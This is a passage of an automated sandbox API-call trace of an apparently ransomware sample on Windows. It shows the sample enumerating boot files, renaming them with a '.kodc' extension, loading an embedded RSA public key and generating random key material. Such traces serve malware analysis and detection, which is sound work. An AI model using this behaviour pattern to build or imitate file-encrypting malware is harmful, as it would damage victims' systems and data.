lpMem=0x33308d8 | out: hHeap=0x630000) returned 1 [0094.353] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG1") returned=".LOG1" [0094.353] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0094.353] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=0) returned 1 [0094.353] CloseHandle (hObject=0x5cc) returned 1 [0094.353] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0094.353] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f08 | out: hHeap=0x630000) returned 1 [0094.353] MoveFileW (lpExistingFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), lpNewFileName="C:\\Boot\\BCD.LOG1.kodc" (normalized: "c:\\boot\\bcd.log1.kodc")) returned 1 [0094.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0094.354] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0094.354] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308d8 [0094.354] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0094.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308d8 | out: hHeap=0x630000) returned 1 [0094.355] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG2") returned=".LOG2" [0094.355] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0094.355] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=0) returned 1 [0094.355] CloseHandle (hObject=0x5cc) returned 1 [0094.355] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0094.355] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.355] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f08 | out: hHeap=0x630000) returned 1 [0094.355] MoveFileW (lpExistingFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), lpNewFileName="C:\\Boot\\BCD.LOG2.kodc" (normalized: "c:\\boot\\bcd.log2.kodc")) returned 1 [0094.356] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.356] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0094.356] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0094.356] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308d8 [0094.356] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0094.356] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308d8 | out: hHeap=0x630000) returned 1 [0094.356] PathFindExtensionW (pszPath="C:\\Boot\\BOOTSTAT.DAT") returned=".DAT" [0094.356] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0094.356] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=65536) returned 1 [0094.356] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0094.359] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xffda, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.360] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0094.361] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.361] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x10000, lpOverlapped=0x0) returned 1 [0094.362] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.362] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32cef08 [0094.362] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.362] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.362] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0094.364] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0094.364] CryptHashData (hHash=0x3331b88, pbData=0x32cef08, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.364] CryptGetHashParam (in: hHash=0x3331b88, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0094.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32f7168 [0094.364] CryptGetHashParam (in: hHash=0x3331b88, dwParam=0x2, pbData=0x32f7168, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32f7168, pdwDataLen=0x9e2fa54) returned 1 [0094.364] GetLastError () returned 0x0 [0094.364] SetLastError (dwErrCode=0x0) [0094.365] GetLastError () returned 0x0 [0094.365] SetLastError (dwErrCode=0x0) [0094.365] GetLastError () returned 0x0 [0094.365] SetLastError (dwErrCode=0x0) [0094.365] GetLastError () returned 0x0 [0094.365] SetLastError (dwErrCode=0x0) [0094.365] GetLastError () returned 0x0 [0094.365] SetLastError (dwErrCode=0x0) [0094.365] GetLastError () returned 0x0 [0094.365] SetLastError (dwErrCode=0x0) [0094.365] GetLastError () returned 0x0 [0094.365] SetLastError (dwErrCode=0x0) [0094.365] GetLastError () returned 0x0 [0094.366] SetLastError (dwErrCode=0x0) [0094.366] GetLastError () returned 0x0 [0094.366] SetLastError (dwErrCode=0x0) [0094.366] GetLastError () returned 0x0 [0094.366] SetLastError (dwErrCode=0x0) [0094.366] GetLastError () returned 0x0 [0094.366] SetLastError (dwErrCode=0x0) [0094.366] GetLastError () returned 0x0 [0094.366] SetLastError (dwErrCode=0x0) [0094.366] GetLastError () returned 0x0 [0094.366] SetLastError (dwErrCode=0x0) [0094.366] GetLastError () returned 0x0 [0094.366] SetLastError (dwErrCode=0x0) [0094.366] GetLastError () returned 0x0 [0094.366] SetLastError (dwErrCode=0x0) [0094.366] GetLastError () returned 0x0 [0094.366] SetLastError (dwErrCode=0x0) [0094.367] GetLastError () returned 0x0 [0094.367] SetLastError (dwErrCode=0x0) [0094.367] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308d8 [0094.367] GetLastError () returned 0x0 [0094.367] SetLastError (dwErrCode=0x0) [0094.367] GetLastError () returned 0x0 [0094.367] SetLastError (dwErrCode=0x0) [0094.367] GetLastError () returned 0x0 [0094.367] SetLastError (dwErrCode=0x0) [0094.367] GetLastError () returned 0x0 [0094.367] SetLastError (dwErrCode=0x0) [0094.367] GetLastError () returned 0x0 [0094.367] SetLastError (dwErrCode=0x0) [0094.367] GetLastError () returned 0x0 [0094.367] SetLastError (dwErrCode=0x0) [0094.367] GetLastError () returned 0x0 [0094.367] SetLastError (dwErrCode=0x0) [0094.367] GetLastError () returned 0x0 [0094.367] SetLastError (dwErrCode=0x0) [0094.367] GetLastError () returned 0x0 [0094.367] SetLastError (dwErrCode=0x0) [0094.367] GetLastError () returned 0x0 [0094.368] SetLastError (dwErrCode=0x0) [0094.368] GetLastError () returned 0x0 [0094.368] SetLastError (dwErrCode=0x0) [0094.368] GetLastError () returned 0x0 [0094.368] SetLastError (dwErrCode=0x0) [0094.368] GetLastError () returned 0x0 [0094.368] SetLastError (dwErrCode=0x0) [0094.368] GetLastError () returned 0x0 [0094.368] SetLastError (dwErrCode=0x0) [0094.368] GetLastError () returned 0x0 [0094.368] SetLastError (dwErrCode=0x0) [0094.368] GetLastError () returned 0x0 [0094.368] SetLastError (dwErrCode=0x0) [0094.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0094.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308d8 | out: hHeap=0x630000) returned 1 [0094.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32f7168 | out: hHeap=0x630000) returned 1 [0094.368] CryptDestroyHash (hHash=0x3331b88) returned 1 [0094.368] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0094.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0094.368] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0094.368] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0094.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33172f8 [0094.369] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0094.369] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f08 | out: hHeap=0x630000) returned 1 [0094.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0094.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10000) returned 0x9ba4d90 [0094.371] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33172f8 | out: hHeap=0x630000) returned 1 [0094.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cef08 [0094.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33172f8 [0094.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0094.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0094.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce888 [0094.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fba0 [0094.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x3320bf0 [0094.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x656838 [0094.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x33208a8 [0094.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x3320890 [0094.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fa38 [0094.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a3e8 [0094.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32f7168 [0094.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a3d0 [0094.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a448 [0094.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a3a0 [0094.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fde0 [0094.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a4c0 [0094.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a490 [0094.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a460 [0094.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a328 [0094.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0094.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0094.372] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x3340958 [0094.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0094.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a490 | out: hHeap=0x630000) returned 1 [0094.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a328 | out: hHeap=0x630000) returned 1 [0094.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a460 | out: hHeap=0x630000) returned 1 [0094.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0094.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0094.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a460 [0094.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x726380 [0094.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a328 [0094.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32f7228 [0094.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a490 [0094.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x7263c0 [0094.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x32b75c0 [0094.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308d8 [0094.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0094.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32f7268 [0094.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0094.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32f71e8 [0094.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0094.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b75c0 | out: hHeap=0x630000) returned 1 [0094.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a328 | out: hHeap=0x630000) returned 1 [0094.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7263c0 | out: hHeap=0x630000) returned 1 [0094.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a490 | out: hHeap=0x630000) returned 1 [0094.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32f7228 | out: hHeap=0x630000) returned 1 [0094.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x726380 | out: hHeap=0x630000) returned 1 [0094.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a460 | out: hHeap=0x630000) returned 1 [0094.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308d8 | out: hHeap=0x630000) returned 1 [0094.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0094.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3340958 | out: hHeap=0x630000) returned 1 [0094.374] GetCurrentThreadId () returned 0x42c [0094.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x190) returned 0x9b937c0 [0094.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce820 [0094.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fd08 [0094.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a460 [0094.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0094.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x695768 [0094.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x33171a8 [0094.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0094.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0094.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x726380 [0094.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x7263c0 [0094.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0094.375] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0094.375] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0094.375] GetCurrentThreadId () returned 0x42c [0094.375] GetVersionExA (in: lpVersionInformation=0x9e2f380*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x48, dwMinorVersion=0x9e2f3a8, dwBuildNumber=0x420cab, dwPlatformId=0x0, szCSDVersion="þBE") | out: lpVersionInformation=0x9e2f380*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0094.375] LoadLibraryA (lpLibFileName="ADVAPI32.DLL") returned 0x754b0000 [0094.375] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76e10000 [0094.376] LoadLibraryA (lpLibFileName="NETAPI32.DLL") returned 0x73680000 [0094.972] GetProcAddress (hModule=0x73680000, lpProcName="NetStatisticsGet") returned 0x7368644f [0094.972] GetProcAddress (hModule=0x73680000, lpProcName="NetApiBufferFree") returned 0x738d13d2 [0094.972] NetStatisticsGet (in: ServerName=0x0, Service=0x4f6c18, Level=0x0, Options=0x0, Buffer=0x9e2f02c | out: Buffer=0x9e2f02c) returned 0x0 [0094.977] GetCurrentThreadId () returned 0x42c [0094.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0094.977] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0094.977] NetApiBufferFree (Buffer=0x32db0d8) returned 0x0 [0094.977] NetStatisticsGet (in: ServerName=0x0, Service=0x4f6c3c, Level=0x0, Options=0x0, Buffer=0x9e2f02c | out: Buffer=0x9e2f02c) returned 0x0 [0095.407] GetCurrentThreadId () returned 0x42c [0095.407] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0095.407] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0095.407] NetApiBufferFree (Buffer=0x3338dc8) returned 0x0 [0095.407] FreeLibrary (hLibModule=0x73680000) returned 1 [0095.413] GetProcAddress (hModule=0x754b0000, lpProcName="CryptAcquireContextW") returned 0x754bdf14 [0095.414] GetProcAddress (hModule=0x754b0000, lpProcName="CryptGenRandom") returned 0x754bdfc8 [0095.414] GetProcAddress (hModule=0x754b0000, lpProcName="CryptReleaseContext") returned 0x754be124 [0095.415] CryptAcquireContextW (in: phProv=0x9e2f018, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2f018*=0x693400) returned 1 [0095.416] CryptGenRandom (in: hProv=0x693400, dwLen=0x40, pbBuffer=0x9e2f464 | out: pbBuffer=0x9e2f464) returned 1 [0095.416] GetCurrentThreadId () returned 0x42c [0095.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0095.416] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0095.416] CryptReleaseContext (hProv=0x693400, dwFlags=0x0) returned 1 [0095.416] CryptAcquireContextW (in: phProv=0x9e2f018, szContainer=0x0, szProvider="Intel Hardware Cryptographic Service Provider", dwProvType=0x16, dwFlags=0x0 | out: phProv=0x9e2f018*=0x693400) returned 0 [0095.416] FreeLibrary (hLibModule=0x754b0000) returned 1 [0095.417] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0095.417] GetProcAddress (hModule=0x400000, lpProcName="_OPENSSL_isservice") returned 0x0 [0095.417] GetDesktopWindow () returned 0x10010 [0095.417] GetProcessWindowStation () returned 0x48 [0095.417] GetUserObjectInformationW (in: hObj=0x48, nIndex=2, pvInfo=0x0, nLength=0x0, lpnLengthNeeded=0x9e2efa0 | out: pvInfo=0x0, lpnLengthNeeded=0x9e2efa0) returned 0 [0095.417] GetLastError () returned 0x7a [0095.418] GetUserObjectInformationW (in: hObj=0x48, nIndex=2, pvInfo=0x9e2ef80, nLength=0x10, lpnLengthNeeded=0x9e2efa0 | out: pvInfo=0x9e2ef80, lpnLengthNeeded=0x9e2efa0) returned 1 [0095.418] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x76780000 [0095.419] GetProcAddress (hModule=0x76780000, lpProcName="GetForegroundWindow") returned 0x767a2320 [0095.419] GetProcAddress (hModule=0x76780000, lpProcName="GetCursorInfo") returned 0x767f812f [0095.419] GetProcAddress (hModule=0x76780000, lpProcName="GetQueueStatus") returned 0x767a3924 [0095.419] GetForegroundWindow () returned 0x10266 [0095.419] GetCurrentThreadId () returned 0x42c [0095.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0095.419] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0095.420] GetCursorInfo (in: pci=0x9e2f450 | out: pci=0x9e2f450) returned 1 [0095.420] GetQueueStatus (flags=0xbf) returned 0x0 [0095.420] GetCurrentThreadId () returned 0x42c [0095.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0095.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0095.420] FreeLibrary (hLibModule=0x76780000) returned 1 [0095.420] GetProcAddress (hModule=0x76e10000, lpProcName="CreateToolhelp32Snapshot") returned 0x76e4735f [0095.421] GetProcAddress (hModule=0x76e10000, lpProcName="CloseToolhelp32Snapshot") returned 0x0 [0095.421] GetProcAddress (hModule=0x76e10000, lpProcName="Heap32First") returned 0x76ea5763 [0095.422] GetProcAddress (hModule=0x76e10000, lpProcName="Heap32Next") returned 0x76ea594e [0095.422] GetProcAddress (hModule=0x76e10000, lpProcName="Heap32ListFirst") returned 0x76ea5621 [0095.423] GetProcAddress (hModule=0x76e10000, lpProcName="Heap32ListNext") returned 0x76ea56cb [0095.423] GetProcAddress (hModule=0x76e10000, lpProcName="Process32First") returned 0x76e48ae7 [0095.424] GetProcAddress (hModule=0x76e10000, lpProcName="Process32Next") returned 0x76e488a4 [0095.424] GetProcAddress (hModule=0x76e10000, lpProcName="Thread32First") returned 0x76ea5b93 [0095.425] GetProcAddress (hModule=0x76e10000, lpProcName="Thread32Next") returned 0x76ea5c3f [0095.425] GetProcAddress (hModule=0x76e10000, lpProcName="Module32First") returned 0x76ea5cd9 [0095.426] GetProcAddress (hModule=0x76e10000, lpProcName="Module32Next") returned 0x76ea5dc2 [0095.426] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x6b4 [0095.449] GetTickCount () returned 0x11f01d2 [0095.449] Heap32ListFirst (hSnapshot=0x6b4, lphl=0x9e2f454) returned 1 [0095.449] GetCurrentThreadId () returned 0x42c [0095.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0095.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 